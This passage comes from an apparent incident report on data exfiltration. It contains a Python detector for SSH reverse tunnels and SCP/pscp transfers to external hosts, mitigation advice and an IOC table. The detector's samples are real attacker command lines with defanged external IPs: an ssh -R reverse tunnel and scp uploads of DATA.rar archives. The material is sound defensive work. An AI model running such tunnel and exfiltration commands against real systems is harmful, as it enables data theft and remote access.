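        return True        # assumption: a hostname we cannot classify counts as external

def findings(cmdline):
    """(kind, remote_host, port, detail) tuples for one command line."""
    info = parse_cmdline(cmdline)
    if info is None:
        return []
    hosts = remote_hosts(info)
    out = []
    for spec in info["reverse"]:                     # [bind:]port:host:hostport
        parts = spec.split(":")
        exposed = f"{parts[-2] or '*'}:{parts[-1]}"
        out.append(("reverse_tunnel", hosts[0] if hosts else "?", info["port"], exposed))
    if info["tool"] in ("scp", "pscp"):
        for host in hosts:
            if is_external(host):
                out.append(("external_transfer", host, info["port"], info["tool"]))
    return out

SAMPLE_CMDLINES = [
    "ssh -qTfnN -R 43222:127.0.0.1:22 <user>@167.172.134[.]147 -p443",
    "scp DATA.rar test@192.241.139[.]130:/home/test -P 443",
    "scp -P 80 DATA.zip root@209.250.244[.]179:/root/",
    "pscp.exe -P 443 -pw Secret DATA.rar test@192.241.139[.]130:/home/test",
    "ssh SVC_1@10.0.0.12",                               # constructed: benign internal session
    "scp -p report.txt backup@10.0.0.20:/srv/backups/",  # constructed: benign internal copy
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for f in findings(line):
            print(f, "<-", line)
```

In an EDR or Sysmon (Event ID 1, process creation) pipeline this runs per event. A reverse-tunnel finding should alert on its own; an external-transfer finding is the one to join with an archive-creation event by the same user minutes earlier, which is the compress-then-transfer sequence seen in this incident.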
Understanding attackers’ methods is crucial for improving your organization’s security posture. Awareness of these tactics allows you to better prepare and implement more effective and targeted monitoring and response strategies. For a deeper dive into the tools and techniques commonly used by attackers for data exfiltration, see our blog on exfiltration tools.
Mitigation
Deploy Security Tools to Detect and Prevent Exfiltration: UBA tools can be deployed to monitor and analyze user behavior patterns. These tools can detect anomalies such as unusually large data transfers or access patterns that deviate from normal activity, which, in turn, trigger alerts for further investigation. IDS and IPS systems can also be deployed to monitor network traffic for unusual patterns, as well as detect and block suspicious activities, preventing data exfiltration.
Conclusion
The data exfiltration incident detailed in this report underscores the common tactics employed by threat actors, who often take the path of least resistance to achieve their objectives. Attackers frequently use native commands like SSH and freely available tools such as WinRAR for data compression and OpenSSH SCP for secure data transfer. These commands and tools help attackers evade detection systems and exploit less-monitored network traffic channels. This highlights the critical importance of having robust solutions to counter these prevalent tactics and tools to ensure a strong security posture.
By working as an extension of the customer’s security team, ReliaQuest carried out an investigation and recommended effective remediation strategies—such as isolating affected hosts, resetting compromised service accounts, and deploying GreyMatter Response Playbooks to block IOCs—allowing the customer to focus on implementing response actions, ensuring that further damage was prevented. Additionally, creating ARPs to automate response and containment actions further enhances an organization’s overall security operations by reducing their MTTC to as little as five minutes. By adopting these strategies and leveraging advanced detection and response capabilities, organizations can better prepare for and mitigate similar threats, ensuring threats are stopped early in the attack lifecycle and critical assets are safeguarded.
Indicators of Compromise
IP Address | Cloud Service Provider |
---|---|
45.77.94[.]53 | Vultr |
64.94.85[.]219 | BL Networks |
149.28.219[.]210 | Vultr |
167.172.134[.]147 | DigitalOcean |
192.241.139[.]130 | DigitalOcean |
209.250.244[.]179 | Vultr |